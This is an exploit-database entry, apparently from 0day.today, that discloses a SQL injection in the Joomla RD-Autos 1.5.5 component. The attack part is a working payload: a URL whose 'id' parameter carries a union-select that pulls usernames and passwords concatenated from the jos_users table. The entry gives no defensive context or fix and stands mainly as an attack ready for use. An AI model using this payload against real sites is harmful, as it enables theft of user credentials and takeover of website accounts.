Joomla Component RD-Autos 1.5.5 (id) SQL Injection Vulnerability

2009-01-15T00:00:00
ID 1337DAY-ID-4681
Type zdt
Reporter [email protected]
Modified 2009-01-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Joomla Component RD-Autos 1.5.5 (id) SQL Injection Vulnerability
================================================================


#############################################################################
#							                    #
#           Joomla Component RDAutos SQL Injection Vulnerability            #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: [email protected]

########################################

[~] ScriptName:     "Joomla"
[~] Component:      "RDAutos (com_rdautos)"
[~] Version:        "1.5.5 Stable" 
[~] Date:           "29/09/2008"
[~] Author:         "Robert Dam"
[~] Author URL:     "www.rd-media.org"

########################################

[~] Exploit /index.php?option=com_rdautos&view=category&id=[SQL]&Itemid=54
[~] Example /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54

########################################


#  0day.today [2018-02-17]  #